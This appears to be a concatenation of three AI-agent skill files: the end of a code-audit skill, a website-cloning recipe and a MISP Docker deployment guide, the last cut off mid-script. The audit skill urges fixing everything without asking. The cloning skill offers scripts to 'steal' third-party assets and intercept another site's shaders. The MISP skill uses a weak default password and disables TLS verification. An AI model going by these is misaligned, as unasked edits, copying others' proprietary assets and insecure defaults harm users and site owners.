- **Verify Changes** - Run tests after making changes
- **Be Comprehensive** - Cover architecture, security, performance, testing
- **Optimize Everything** - Bundle size, queries, algorithms, images
- **Add Infrastructure** - Logging, monitoring, error tracking
- **Document Changes** - Explain what was fixed and why
### ❌ Don't Do This
- **Don't Ask Questions** - Understand the codebase autonomously
- **Don't Wait for Instructions** - Scan and fix automatically
- **Don't Report Only** - Actually make the fixes
- **Don't Skip Files** - Scan every file in the project
- **Don't Ignore Context** - Understand what the code does
- **Don't Break Things** - Verify tests pass after changes
- **Don't Be Partial** - Fix all issues, not just some
## Autonomous Scanning Instructions
**When this skill is invoked, automatically:**
1. **Discover the codebase:**
- Use `listDirectory` to find all files recursively
- Use `readFile` to read every source file
- Identify tech stack from package.json, requirements.txt, etc.
- Map out architecture and structure
2. **Scan line-by-line for issues:**
- Check every line for security vulnerabilities
- Identify performance bottlenecks
- Find code quality issues
- Detect architectural problems
- Find missing tests
3. **Fix everything automatically:**
- Use `strReplace` to fix issues in files
- Add missing files (tests, configs, docs)
- Refactor problematic code
- Add production infrastructure
- Optimize performance
4. **Verify and report:**
- Run tests to ensure nothing broke
- Measure improvements
- Generate comprehensive report
- Show before/after metrics
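**Do all of this without asking the user for input, except where the Safety & Workflow rules require it: fixes are applied only in fix mode, and local test runs against external dependencies need confirmation.**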
## Common Pitfalls
### Problem: Too Many Issues
**Symptoms:** Team paralyzed by 200+ issues
**Solution:** Focus on critical/high priority only, create sprints
### Problem: False Positives
**Symptoms:** Flagging non-issues
**Solution:** Understand context, verify manually, ask developers
### Problem: No Follow-Up
**Symptoms:** Audit report ignored
**Solution:** Create GitHub issues, assign owners, track in standups
## Production Audit Checklist
### Security
- [ ] No SQL injection vulnerabilities
- [ ] No hardcoded secrets
- [ ] Authentication on protected routes
- [ ] Authorization checks implemented
- [ ] Input validation on all endpoints
- [ ] Password hashing with bcrypt (10+ rounds)
- [ ] HTTPS enforced
- [ ] Dependencies have no vulnerabilities
### Performance
- [ ] No N+1 query problems
- [ ] Database indexes on foreign keys
- [ ] Caching implemented
- [ ] API response time < 200ms
- [ ] Bundle size < 200KB (gzipped)
### Testing
- [ ] Test coverage > 80%
- [ ] Critical paths tested
- [ ] Edge cases covered
- [ ] No flaky tests
- [ ] Tests run in CI/CD
### Production Readiness
- [ ] Environment variables configured
- [ ] Error tracking setup (Sentry)
- [ ] Structured logging implemented
- [ ] Health check endpoints
- [ ] Monitoring and alerting
- [ ] Documentation complete
## Audit Report Template
```markdown
# Production Audit Report
**Project:** [Name]
**Date:** [Date]
**Overall Grade:** [A-F]
## Executive Summary
[2-3 sentences on overall status]
**Critical Issues:** [count]
**High Priority:** [count]
**Recommendation:** [Fix timeline]
## Findings by Category
### Architecture (Grade: [A-F])
- Issue 1: [Description]
- Issue 2: [Description]
### Security (Grade: [A-F])
- Issue 1: [Description + Fix]
- Issue 2: [Description + Fix]
### Performance (Grade: [A-F])
- Issue 1: [Description + Fix]
### Testing (Grade: [A-F])
- Coverage: [%]
- Issues: [List]
## Priority Actions
1. [Critical issue] - [Timeline]
2. [High priority] - [Timeline]
3. [High priority] - [Timeline]
## Timeline
- Critical fixes: [X weeks]
- High priority: [X weeks]
- Production ready: [X weeks]
```
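The "Priority Actions" section of the template can be generated from a list of findings. The following is a sketch under assumptions: the `Finding` shape, the four severity levels (taken from the example output earlier in this skill), and the function name `renderPriorityActions` are all hypothetical.

```typescript
type Severity = "critical" | "high" | "medium" | "low";
type Finding = { title: string; severity: Severity; timeline: string };

const SEVERITY_ORDER: Record<Severity, number> = { critical: 0, high: 1, medium: 2, low: 3 };

// Sorts findings by severity (stable, so input order breaks ties) and renders
// the first `limit` entries as the numbered list used in the report template.
function renderPriorityActions(findings: Finding[], limit = 3): string {
  return [...findings]
    .sort((a, b) => SEVERITY_ORDER[a.severity] - SEVERITY_ORDER[b.severity])
    .slice(0, limit)
    .map((f, i) => `${i + 1}. ${f.title} - ${f.timeline}`)
    .join("\n");
}

const sampleFindings: Finding[] = [
  { title: "Add DB indexes", severity: "high", timeline: "2 weeks" },
  { title: "Fix SQL injection", severity: "critical", timeline: "1 week" },
  { title: "Remove dead code", severity: "low", timeline: "backlog" },
  { title: "Add auth to admin routes", severity: "high", timeline: "1 week" },
];
const priorityActions = renderPriorityActions(sampleFindings);
```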
## Related Skills
- `@code-review-checklist` - Code review guidelines
- `@api-security-best-practices` - API security patterns
- `@web-performance-optimization` - Performance optimization
- `@systematic-debugging` - Debug production issues
- `@senior-architect` - Architecture patterns
## Additional Resources
- [OWASP Top 10](https://owasp.org/www-project-top-ten/)
- [Google Engineering Practices](https://google.github.io/eng-practices/)
- [SonarQube Quality Gates](https://docs.sonarqube.org/latest/user-guide/quality-gates/)
- [Clean Code by Robert C. Martin](https://www.amazon.com/Clean-Code-Handbook-Software-Craftsmanship/dp/0132350882)
---
**Pro Tip:** Schedule regular audits (quarterly) to maintain code quality. Prevention is cheaper than fixing production bugs!
High-fidelity visual-first web rebuilding from design references. Screenshot-driven analysis, DOM interrogation for exact CSS values, asset inspection (WebGL...
---
name: clone-anywebsite
description: "High-fidelity visual-first web rebuilding from design references. Screenshot-driven analysis, DOM interrogation for exact CSS values, asset inspection (WebGL, SVGs, fonts), and React/Tailwind componentization. Useful for rebuilding your own sites, learning from design patterns, or prototyping from references you have rights to."
author: SylphAI-Inc
version: 1.0.0
---
# Guide: Visual-First Web Cloning Recipe
> **Legal Notice:** This skill is intended for cloning your own websites, building from design references you have rights to, or learning from public design patterns. Always ensure you have permission before reproducing third-party designs, assets, or branding. Respect copyright, trademarks, and terms of service.
When building a high-fidelity landing page clone, the biggest trap is relying purely on DOM trees and CSS dumps. Modern website builders (Framer, Webflow) generate deeply nested "div soup" and obfuscated CSS to create visual effects.
**The Golden Rule:** Trust your "eyes" (screenshots) first, but when an effect looks too complex to be pure CSS, use **Deep DOM Interrogation** to steal the exact asset.
## The 80/20 Cloning Philosophy
To clone efficiently, you must divide your workflow into two distinct phases so you don't get bogged down pixel-pushing too early:
1. **The 80% Sprint (Speed & Structure):** Get the page laid out rapidly. Use Steps 0-2 to fetch the semantic HTML, scaffold the React component tree (`Navbar`, `Hero`, `Features`), and apply basic Tailwind classes for layout (Flex/Grid) and spacing. Accept approximations here—use solid colors instead of complex gradients, standard CSS shadows, and static backgrounds. **Move fast.**
2. **The 20% Polish (Pixel Perfection & Physics):** Once the 80% structure is on screen, shift gears to meticulous engineering. Use Steps 3-5 to steal the exact math. This is where you use "Sniper CSS" to extract exact multi-stop gradients, rip WebGL canvas backgrounds to `.webm` videos, map massive multi-layer box-shadows, and implement Framer Motion spring physics.
---
## The 6-Step "Visual-First" Recipe
### Step 0: Codebase Scaffolding Strategy
Before writing code, establish a scalable folder structure. Modern landing pages should be componentized.
* **`src/components/layout/`**: `Navbar.tsx`, `Footer.tsx` (Global elements)
* **`src/components/sections/`**: `Hero.tsx`, `Features.tsx`, `Testimonials.tsx` (Page blocks)
* **`src/components/ui/`**: `Button.tsx`, `GlassCard.tsx` (Reusable micro-components)
* **`src/assets/media/`**: Local storage for extracted videos, noise overlays, and icons.
### Step 1: The "Eye Test" (Visual Grounding)
**Before looking at a single line of code, visually ground yourself in the reference site.**
1. **Capture:** Navigate to the target site and take a screenshot using an absolute path.
`mcp_chrome-devtools_take_screenshot(filePath="/absolute/path/to/ref.png")`
2. **Analyze:** Read the image (using your read image tool) and actively identify the *Vibe*:
- **Backgrounds:** Is it flat? A subtle radial gradient? Are there sweeping SVG waves or floating blurred orbs?
- **Buttons:** Are they flat? Glassmorphic (backdrop-blur)? Do they have glowing auras?
- **Typography:** Which specific words are highlighted? Are there gradient text clips?
### Step 2: Macro Structure Capture (Playwright/DOM Snapshot)
*Best for: Getting the general layout and semantic HTML structure (Nav, Hero, Bento Grid, Footer).*
- Take a DOM text snapshot using Chrome DevTools or Playwright to understand the section-by-section flow and extract the actual copy/text.
- **Do not blindly copy the DOM.** Distill the complicated nested builder divs into clean, semantic React (e.g., `<section>`, `<nav>`, `<ul>`).
### Step 3: Micro Extraction (Sniper CSS)
*Best for: Extracting exact pixel-perfect design tokens during the 20% Polish.*
**Tool to use:** `mcp_chrome-devtools_evaluate_script`
**Do NOT query the full `getComputedStyle` object.** It returns 500+ properties, overwhelms the context window, and creates hallucination/confusion. Instead, use targeted JS payloads to extract exactly what you need.
**Script 1: Typography Tokens (Fonts, Spacing, Weights)**
*Why: To perfectly match headings. Used to discover that Calisto's H1 used `-4.8px` letter spacing and specific gray/blue hex colors.*
```javascript
() => {
const el = document.querySelector('h1');
if (!el) return "Not found"; // getComputedStyle throws on null
const s = window.getComputedStyle(el);
return JSON.stringify({
color: s.color,
fontSize: s.fontSize,
fontWeight: s.fontWeight,
letterSpacing: s.letterSpacing,
lineHeight: s.lineHeight
}, null, 2);
}
```
**Script 2: Bounding Box & Overflow (The Glow/Shadow Check)**
*Why: To find exact dimensions and see if glowing effects bleed outside the element. We used this to realize the Hero button was exactly 160x160px with `overflow: visible`, allowing inner conic gradients to blur outside the borders.*
```javascript
() => {
const btn = Array.from(document.querySelectorAll('a')).find(l => l.textContent.includes('Get Started'));
if (!btn) return "Not found";
const rect = btn.getBoundingClientRect();
const s = window.getComputedStyle(btn);
return JSON.stringify({
width: rect.width,
height: rect.height,
display: s.display,
borderRadius: s.borderRadius,
overflow: s.overflow,
boxShadow: s.boxShadow
}, null, 2);
}
```
**Script 3: Glassmorphism & Backgrounds**
*Why: To grab exact transparency, blur, and gradient values for navbars or cards.*
```javascript
() => {
const el = document.querySelector('nav');
if (!el) return "Not found"; // getComputedStyle throws on null
const s = window.getComputedStyle(el);
return JSON.stringify({
background: s.background,
backdropFilter: s.backdropFilter,
border: s.border
}, null, 2);
}
```
**Script 4: Typography & Forced Line-Breaks**
*Why: A clone looks instantly fake if text wraps differently than the original. Don't let the browser decide fluidly. Extract exact container widths to force identical line breaks.*
```javascript
() => {
const el = document.querySelector('h1');
if (!el) return "Not found"; // avoid a TypeError when the page has no h1
const r = el.getBoundingClientRect();
return JSON.stringify({
containerMaxWidth: r.width // Use this in Tailwind (e.g., max-w-[900px]) to force exact wraps!
}, null, 2);
}
```
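Turning the measured width into a class name is a one-liner. This sketch assumes Tailwind's arbitrary-value syntax (`max-w-[...]`) and rounds to whole pixels; `toMaxWidthClass` is a hypothetical helper name.

```typescript
// Converts a measured width in CSS pixels into a Tailwind arbitrary max-width class.
function toMaxWidthClass(widthPx: number): string {
  if (!Number.isFinite(widthPx) || widthPx <= 0) {
    throw new RangeError("width must be a positive number of pixels");
  }
  return `max-w-[${Math.round(widthPx)}px]`;
}

const headingClass = toMaxWidthClass(899.6);
```

Rounding keeps the class readable; if sub-pixel widths change where a line wraps, pass the unrounded value into the class by hand instead.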
**Script 5: Abstract Glows & "Orbits" (The Glow Fallacy)**
*Why: A common trap is seeing a background aura and guessing it's a simple radial gradient with a massive `blur()`. High-end templates actually use hard shapes, multi-stop linear gradients, precise matrix transforms (rotations), and specific blend modes with a very tight blur. Eyeballing this turns a sharp "galaxy arm" into a muddy blob.*
```javascript
() => {
const el = document.querySelector('[data-framer-name="Big Circle"]');
if (!el) return "Not found";
const s = window.getComputedStyle(el);
return JSON.stringify({
background: s.background, // Captures complex multi-stop gradients
transform: s.transform, // Captures crucial rotation angles
filter: s.filter, // Captures the exact, often surprisingly small, blur
opacity: s.opacity
}, null, 2);
}
```
### Step 4: Deep DOM Interrogation (The Secret Sauce)
*Best for: Replicating complex glows, overlapping animations, and fluid backgrounds.*
When an effect (like a smooth background or a swirling button) is too complex, **do not guess the math**. Framer and Webflow hide these in layered divs, pseudo-elements, or literal `<video>`/`<canvas>` tags.
**Script 1: Render Engine Identification (Video vs Canvas vs CSS)**
If the background is moving fluidly, you must determine *what* is rendering it before trying to clone it. Find the full-screen background node:
```javascript
() => {
const backgrounds = [];
document.querySelectorAll('*').forEach(el => {
const style = window.getComputedStyle(el);
const rect = el.getBoundingClientRect();
// Look for large background elements: at least 80% of viewport width and 50% of viewport height
if ((style.position === 'fixed' || style.position === 'absolute') &&
(parseInt(style.zIndex, 10) <= 0 || style.zIndex === 'auto') &&
rect.width >= window.innerWidth * 0.8 &&
rect.height >= window.innerHeight * 0.5 &&
el.tagName !== 'BODY' && el.tagName !== 'HTML') {
backgrounds.push({ tag: el.tagName, html: el.outerHTML.substring(0, 300) });
}
});
return JSON.stringify(backgrounds, null, 2);
}
```
*Lesson:* The DOM never lies. You might discover the "complex animation" is actually:
1. **A Video:** A `<video src="...mp4">` tag (like in the Calisto template). *Solution: Extract the URL and drop it in.*
2. **A WebGL Canvas:** A `<canvas data-paper-shaders="true">` tag (like in the Portfolite template). *Solution: Do not hack CSS. Scaffold React Three Fiber and write a GLSL shader. See Script 3.*
3. **A Noise Overlay:** A repeating film-grain image (`background-image: url(...noise.png)`) at 5-10% opacity layered over the effect to prevent color banding.
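The three cases above can be sorted mechanically once the detection script has returned its `{ tag, html }` entries. A rough sketch, assuming that output shape; `classifyBackground` is a hypothetical helper and only sees the truncated `html` snippet, so an overlay defined in a stylesheet will fall through to `'css'`:

```javascript
// Hypothetical helper: labels one entry from the background-detection output.
function classifyBackground(node) {
  const tag = String(node.tag || '').toUpperCase();
  const html = String(node.html || '');
  if (tag === 'VIDEO' || /<video[\s>]/i.test(html)) return 'video';
  if (tag === 'CANVAS' || /<canvas[\s>]/i.test(html)) return 'canvas';
  // Inline background image, e.g. a repeating noise/grain texture.
  if (/background(-image)?\s*:[^;"]*url\(/i.test(html)) return 'image-overlay';
  return 'css';
}

const sample = [
  { tag: 'VIDEO', html: '<video src="bg.mp4" autoplay loop></video>' },
  { tag: 'DIV', html: '<div><canvas data-paper-shaders="true"></canvas></div>' },
  { tag: 'DIV', html: '<div style="background-image: url(noise.png)"></div>' },
];
console.log(sample.map(classifyBackground));
```

Treat the label as a hint for which branch of the workflow to follow next, not as proof of how the effect is rendered.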
**Script 2: Deep Extraction for UI Micro-Components (`outerHTML`)**
To clone a complex modern button or pill badge, do not guess the CSS. Builders use massive multi-layered `box-shadow` strings (e.g., 6 layers of shadow) and precise `rgba` borders to create glowing depth. Extract its literal nested structure:
```javascript
() => {
const btn = Array.from(document.querySelectorAll('a')).find(l => l.textContent.includes('Get Started'));
return btn ? btn.parentElement.outerHTML : 'Not found';
}
```
*Lesson:* This reveals the nested `conic-gradient` divs, `blur()` filters, and massive `box-shadow` arrays. Map those literal strings directly into an arbitrary Tailwind class like `shadow-[0px_0.7px_..._rgba(...)]`.
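Mapping a long computed `box-shadow` string into an arbitrary class by hand is error-prone, because Tailwind arbitrary values use underscores in place of spaces. A minimal sketch of that conversion; `toTailwindShadow` is a hypothetical helper and assumes color functions without nested parentheses:

```javascript
// Hypothetical helper: converts a computed box-shadow string into a
// Tailwind arbitrary-value class.
function toTailwindShadow(boxShadow) {
  const value = boxShadow
    .trim()
    // rgba(0, 0, 0, 0.1) -> rgba(0,0,0,0.1): no spaces inside color functions
    .replace(/\(([^)]*)\)/g, (group) => group.replace(/\s+/g, ''))
    // tighten the commas that separate shadow layers
    .replace(/\s*,\s*/g, ',')
    // remaining spaces become underscores
    .replace(/\s+/g, '_');
  return `shadow-[${value}]`;
}

console.log(
  toTailwindShadow('rgba(0, 0, 0, 0.1) 0px 1px 2px 0px, rgba(255, 255, 255, 0.2) 0px 0px 0px 1px inset')
);
// shadow-[rgba(0,0,0,0.1)_0px_1px_2px_0px,rgba(255,255,255,0.2)_0px_0px_0px_1px_inset]
```

Paste the extracted string in unchanged; the point is to avoid retyping any of the offsets or alpha values.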
**Script 3: The API Interceptor (Shader Stealer)**
If the target is using a WebGL `<canvas>`, the exact GLSL shader code is often minified in JS chunks. You can hijack the browser's WebGL API to intercept the raw shader math before it goes to the GPU.
Inject this script *before* the page loads (using `initScript` in `mcp_chrome-devtools_navigate_page`):
```javascript
window.__interceptedShaders = [];
function hookContext(glPrototype) {
if (!glPrototype) return;
const originalShaderSource = glPrototype.shaderSource;
glPrototype.shaderSource = function(shader, source) {
window.__interceptedShaders.push(source);
originalShaderSource.call(this, shader, source);
};
}
hookContext(WebGLRenderingContext.prototype);
if (typeof WebGL2RenderingContext !== 'undefined') hookContext(WebGL2RenderingContext.prototype);
```
Then, evaluate `JSON.stringify(window.__interceptedShaders)` to read the exact GLSL math!
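The intercepted array mixes vertex and fragment shaders, and the visual effect almost always lives in a fragment shader. A rough sketch for separating them, assuming the heuristic that only vertex shaders write `gl_Position`; `splitShaders` is a hypothetical helper:

```javascript
// Hypothetical helper: splits intercepted GLSL sources into vertex and
// fragment shaders. Heuristic: a vertex shader assigns gl_Position.
function splitShaders(sources) {
  const vertex = [];
  const fragment = [];
  for (const src of sources) {
    if (typeof src !== 'string') continue; // skip anything that is not source text
    (/\bgl_Position\b/.test(src) ? vertex : fragment).push(src);
  }
  // Longest first: the main effect shader tends to be the largest one.
  fragment.sort((a, b) => b.length - a.length);
  return { vertex, fragment };
}

const intercepted = [
  'attribute vec2 p; void main() { gl_Position = vec4(p, 0.0, 1.0); }',
  'precision highp float; uniform float t; void main() { gl_FragColor = vec4(t); }',
];
const { vertex, fragment } = splitShaders(intercepted);
console.log(vertex.length, fragment.length); // 1 1
```

Run it on the parsed result of `window.__interceptedShaders` and start reading from `fragment[0]`.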
**Script 4: The "Last Resort" Canvas Recorder**
When a WebGL Canvas shader is too heavily obfuscated to intercept (or relies on proprietary 3D math engines), do not try to guess the GLSL math. Instead, literally record the GPU output directly from the reference site and use it as a seamless background video.
```javascript
() => {
return new Promise((resolve) => {
const canvas = document.querySelector('canvas');
if (!canvas) return resolve("No canvas found.");
const stream = canvas.captureStream(30);
const recorder = new MediaRecorder(stream, { mimeType: 'video/webm' });
const chunks = [];
recorder.ondataavailable = e => { if (e.data.size > 0) chunks.push(e.data); };
recorder.onstop = () => {
const blob = new Blob(chunks, { type: 'video/webm' });
const url = URL.createObjectURL(blob);
const a = document.createElement('a');
a.href = url;
a.download = 'framer_perfect_loop.webm';
document.body.appendChild(a);
a.click(); // Triggers the download
document.body.removeChild(a);
resolve("Recorded 8s and downloaded: framer_perfect_loop.webm");
};
recorder.start();
setTimeout(() => recorder.stop(), 8000); // 8 seconds for a good loop
});
}
```
### Step 5: Synthesis & Rebuild (Tailwind + Framer Motion)
*Best for: Translating visual effects into clean, modern tech stacks.*
1. **Build the Base (The 80%):** Scaffold the structure using Step 2.
2. **Apply Tokens (The 20%):** Plug in the exact colors, typography, and spacing from Step 3.
3. **Entrance Physics:** Use `framer-motion` for buttery smooth spring entrances instead of standard CSS transitions.
4. **Recreate the "Vibe":**
- *Videos/Canvas:* Drop the extracted `<video>` tag directly into an absolute background container.
- *Framer Glows/Auras:* Use layered absolute divs with exact gradient/blur tokens.
5. **Verify (The Two-Tab & Stitch Workflow):**
- **Two Tabs:** Keep the reference site and your local clone open in separate MCP browser tabs.
- **CRITICAL - Explicit Page Selection:** When juggling multiple tabs, taking a screenshot without focusing the tab will capture the wrong page or stale state. You MUST follow this exact sequence:
1. `mcp_chrome-devtools_list_pages` to get the `pageId` for both tabs.
2. `mcp_chrome-devtools_select_page(pageId=REF_ID)` to explicitly focus the reference.
3. Take the reference screenshot with an absolute path (`ref_latest.png`).
4. `mcp_chrome-devtools_select_page(pageId=LOCAL_ID)` to explicitly focus your local clone.
5. *(Optional but recommended)* Run `location.reload()` via script if WebGL or HMR is stuck.
6. Take the local screenshot with an absolute path (`local_latest.png`).
- **Side-by-Side Stitching:** Use a quick Python script via your shell tool to stitch them together horizontally for a flawless 1:1 visual comparison:
```bash
python3 -c "
from PIL import Image
i1 = Image.open('/absolute/path/ref_latest.png')
i2 = Image.open('/absolute/path/local_latest.png')
h = min(i1.height, i2.height)
i1 = i1.resize((int(i1.width * h / i1.height), h))
i2 = i2.resize((int(i2.width * h / i2.height), h))
dst = Image.new('RGB', (i1.width + i2.width, h))
dst.paste(i1, (0, 0))
dst.paste(i2, (i1.width, 0))
dst.save('/absolute/path/combined.png')
"
```
- **Read:** Use your read image tool on `combined.png` to spot any remaining visual discrepancies side-by-side.
## Troubleshooting & Best Practices
- **"The background animation is missing!"** -> You assumed it was CSS. Run the Render Engine Identification script (Step 4, Script 1) to find the hidden `<video>` or `<canvas>` tag.
- **"The Button looks totally different!"** -> Extract the `outerHTML` of the button's parent. You likely missed overlapping blurred divs or 6-layer box shadows that create the glow effect.
- **"The Text Wraps Wrong!"** -> You let the browser decide fluidly. Extract the exact bounding box width from the original and hardcode it (`max-w-[...]`).
- **Save Paths:** Always use **Absolute Paths** for saving screenshots to avoid losing them in the MCP server's hidden working directories.
- **Zombie Browsers:** If the DevTools server fails with a lock error, run `pkill -f "chrome-devtools-mcp" || true`.
---
**Ethical/Legal Note:** When cloning websites, ensure you have the appropriate permissions. For learning purposes, focus on reverse-engineering the structural layout and design systems (spacing, colors, typography) rather than ripping proprietary copy, branding, or gated assets.
Deploy MISP threat intelligence platform on any Docker-ready Linux host. Official misp-docker project with automatic MariaDB memory tuning (prevents OOM on s...
---
name: soc-deploy-misp
version: 1.0.0
description: "Deploy MISP threat intelligence platform on any Docker-ready Linux host. Official misp-docker project with automatic MariaDB memory tuning (prevents OOM on small VMs), API key generation via cake CLI, and credential management."
tags:
  - soc
  - misp
  - threat-intelligence
  - security
  - docker
  - automation
  - ioc
category: security
---
# SOC Deploy: MISP (Malware Information Sharing Platform)
Deploy MISP threat intelligence platform on any Docker-ready Linux host using the official misp-docker project.
**This skill does NOT create VMs.** It expects an SSH target with Docker installed. Use `hyperv-create-vm` or `proxmox-create-vm` first if you need infrastructure.
## When to Use
- "deploy misp"
- "set up misp"
- "install misp"
- "threat intel platform"
- "ioc sharing platform"
## User Inputs

| Parameter | Default | Required |
|-----------|---------|----------|
| SSH target | - | Yes (user@host) |
| Admin email | [email protected] | No |
| Admin password | ChangeMe123! | No |
| Host RAM (for buffer pool) | 4GB | No |

## Prerequisites Check
```bash
# SSH works
ssh <target> "echo OK"
# Docker + Compose v2
ssh <target> "docker --version && docker compose version"
# RAM check (need 3GB+ free)
ssh <target> "free -h | grep Mem"
```
## Execution
### Single command deployment
```bash
scp scripts/setup.sh <target>:~/
ssh <target> "bash ~/setup.sh '[email protected]' '<password>'"
```
### What setup.sh does
1. **Clone official misp-docker** from GitHub
2. **Configure .env:**
   - `MISP_BASEURL`, `MISP_ADMIN_EMAIL`, `MISP_ADMIN_PASSPHRASE`
   - Generate random MySQL passwords
   - Set `INNODB_BUFFER_POOL_SIZE` based on host RAM (CRITICAL)
3. **`docker compose up -d`**
4. **Poll for MISP readiness** (5-10 min on first boot for DB migrations)
5. **Generate API key** via cake CLI:
   ```bash
   docker compose exec -T misp /var/www/MISP/app/Console/cake user change_authkey <email>
   ```
6. **Verify API** with `/servers/getVersion`
7. **Save credentials** to `~/misp/api-key.txt`
### Output to User
```
MISP deployed!

URL: https://<target>
Admin: [email protected] / <password>
API Key: <key>

MCP Connection:
  MISP_URL=https://<target>
  MISP_API_KEY=<key>
  MISP_VERIFY_SSL=false

Note: Self-signed HTTPS. Use curl -k for API calls.
Credentials saved to: ~/misp/api-key.txt
```
## InnoDB Buffer Pool Sizing
The #1 failure on small VMs. Default buffer pool is 2GB, which kills MariaDB on 4GB hosts.

| Host RAM | INNODB_BUFFER_POOL_SIZE |
|----------|------------------------|
| 4 GB | 512M |
| 8 GB | 2048M |
| 16 GB | 4096M |

## Critical Gotchas
See `references/gotchas.md` for full details:
1. **MariaDB OOM (showstopper):** Default InnoDB buffer pool is 2GB. On 4GB hosts, MariaDB crashes instantly. MUST set `INNODB_BUFFER_POOL_SIZE` in `.env`
2. **Recovery from OOM:** `docker compose down -v` to wipe failed DB volume, fix `.env`, restart
3. **First boot is slow:** 5-10 min for DB schema creation and initial data load
4. **Self-signed HTTPS:** Use `curl -k` for all API calls
5. **Advanced authkeys:** Enabled by default. `cake` CLI is the most reliable key generation method
6. **MISP web UI:** `https://<ip>` (port 443, not 80)
## Timeout Strategy
Total: ~12-15 min (docker pull + first boot + setup). Split:
- Turn 1: Clone, configure, `docker compose up -d` (~3 min + pull time)
- Turn 2: Wait for health + generate API key (~5-7 min)
## Pairs With
- `hyperv-create-vm` - create a Hyper-V VM, then deploy MISP on it
- `proxmox-create-vm` - create a Proxmox LXC/VM, then deploy MISP on it
- `soc-deploy-thehive` - deploy TheHive alongside for case management
FILE:README.md
# soc-deploy-misp
Deploy MISP threat intelligence platform on any Docker-ready Linux host. Handles MariaDB memory tuning automatically, generates API keys via cake CLI.
## Platform Agnostic
This skill deploys the application. It doesn't create infrastructure.
Pair with:
- `hyperv-create-vm` for Hyper-V VMs
- `proxmox-create-vm` for Proxmox containers/VMs
- Or any existing Linux host with Docker
## Key Fix: MariaDB OOM
The #1 deployment failure on small hosts. Default InnoDB buffer pool is 2GB, which kills MariaDB on 4GB VMs. This skill auto-calculates the correct `INNODB_BUFFER_POOL_SIZE` based on available RAM.
## What Gets Automated
- Official misp-docker clone and configuration
- MariaDB memory tuning
- Docker Compose deployment
- Admin provisioning
- API key generation via cake CLI
- MCP connection info output
## Requirements
- SSH access to a Linux host with Docker + Compose v2
- At least 3GB RAM free
## Tags
soc, misp, threat-intelligence, security, docker, automation, ioc
FILE:references/env-template.env
# MISP .env template
# Copy to misp-docker/.env and customize

# MISP Core
MISP_BASEURL=http://CHANGE_ME
MISP_ADMIN_EMAIL=[email protected]
MISP_ADMIN_PASSPHRASE=CHANGE_ME

# MySQL/MariaDB
MYSQL_HOST=db
MYSQL_PORT=3306
MYSQL_DATABASE=misp
MYSQL_USER=misp
MYSQL_PASSWORD=CHANGE_ME_RANDOM
MYSQL_ROOT_PASSWORD=CHANGE_ME_RANDOM

# CRITICAL: Scale based on host RAM
# 4GB host = 512M, 8GB = 2048M, 16GB = 4096M
INNODB_BUFFER_POOL_SIZE=512M

# Redis
REDIS_FQDN=redis

# MISP Modules
MISP_MODULES_URL=http://misp-modules
FILE:references/gotchas.md
# Gotchas: MISP Deployment
## MariaDB OOM (Showstopper)
- Default InnoDB buffer pool is **2GB**
- On 4GB hosts, MariaDB crashes instantly with `Out of memory (Needed 2587885448 bytes)`
- MariaDB container enters restart loop
- **Fix:** Set `INNODB_BUFFER_POOL_SIZE` in `.env` BEFORE first `docker compose up`
- Scaling: 4GB = 512M, 8GB = 2048M, 16GB = 4096M
## Recovery from OOM
- If MariaDB already crashed with the wrong buffer size:
  1. `docker compose down -v` (wipes failed DB volume)
  2. Fix `INNODB_BUFFER_POOL_SIZE` in `.env`
  3. `docker compose up -d`
- Without `-v`, the corrupted DB volume persists and MariaDB keeps crashing
## First Boot is Slow
- MISP takes 5-10 minutes on first boot
- DB schema creation, initial data load, worker initialization
- Web UI may show errors during this period
- **Fix:** Poll `https://localhost/users/login` until it returns a login page
## Self-Signed HTTPS
- MISP defaults to self-signed certificates
- All `curl` commands need `-k` flag
- For production: mount proper certs or put behind a reverse proxy
## API Key Generation
- MISP has "advanced authkeys" enabled by default
- The `cake` CLI inside the container is the most reliable method:
  ```bash
  docker compose exec -T misp /var/www/MISP/app/Console/cake user change_authkey <email>
  ```
- API alternative: session login then `POST /auth_keys/add`, but cake is simpler
## Web UI Port
- MISP listens on HTTPS port 443 (not 80)
- URL format: `https://<ip>` (no port needed)
- Port 80 redirects to 443
## Template .env
- Official repo has `template.env`, copy to `.env` before editing
- Don't edit `template.env` directly (git pull conflicts)
FILE:scripts/setup.sh
#!/bin/bash
# Deploy MISP on any Docker-ready Linux host
# Usage: ./setup.sh [admin-email] [admin-password] [host-ram-gb]
# Run ON the target host (not remotely)
set -euo pipefail

# Positional arguments with defaults (see Usage above)
ADMIN_EMAIL="${1:-[email protected]}"
PASSWORD="${2:-ChangeMe123!}"
HOST_RAM_GB="${3:-4}"
MISP_DIR=~/misp/misp-docker

echo "=== MISP Deployment ==="
echo "Admin: $ADMIN_EMAIL | RAM: ${HOST_RAM_GB}GB"
echo ""

# Calculate buffer pool size
case "$HOST_RAM_GB" in
  [1-5]) BUFFER_POOL="512M" ;;
  [6-9]) BUFFER_POOL="2048M" ;;
  1[0-9]) BUFFER_POOL="4096M" ;;
  *) BUFFER_POOL="4096M" ;;
esac
echo "InnoDB buffer pool: $BUFFER_POOL (for ${HOST_RAM_GB}GB RAM)"

# Clone official misp-docker
echo "[1/6] Cloning misp-docker..."
mkdir -p ~/misp
if [ -d "$MISP_DIR" ]; then
  echo "  Already cloned, pulling latest..."
  cd "$MISP_DIR" && git pull --quiet
else
  git clone --quiet https://github.com/MISP/misp-docker.git "$MISP_DIR"
fi
cd "$MISP_DIR"

# Configure .env
echo "[2/6] Configuring .env..."
cp template.env .env
VM_IP=$(hostname -I | awk '{print $1}')
MYSQL_ROOT_PW=$(openssl rand -base64 24)
MYSQL_PW=$(openssl rand -base64 24)
sed -i "s|MISP_BASEURL=.*|MISP_BASEURL=http://${VM_IP}|" .env
sed -i "s|MISP_ADMIN_EMAIL=.*|MISP_ADMIN_EMAIL=${ADMIN_EMAIL}|" .env
sed -i "s|MISP_ADMIN_PASSPHRASE=.*|MISP_ADMIN_PASSPHRASE=${PASSWORD}|" .env

# Set DB passwords
grep -q "MYSQL_ROOT_PASSWORD" .env && \
  sed -i "s|MYSQL_ROOT_PASSWORD=.*|MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PW}|" .env || \
  echo "MYSQL_ROOT_PASSWORD=${MYSQL_ROOT_PW}" >> .env
grep -q "MYSQL_PASSWORD" .env && \
  sed -i "s|MYSQL_PASSWORD=.*|MYSQL_PASSWORD=${MYSQL_PW}|" .env || \
  echo "MYSQL_PASSWORD=${MYSQL_PW}" >> .env

# CRITICAL: Set InnoDB buffer pool to prevent MariaDB OOM
grep -q "INNODB_BUFFER_POOL_SIZE" .env && \
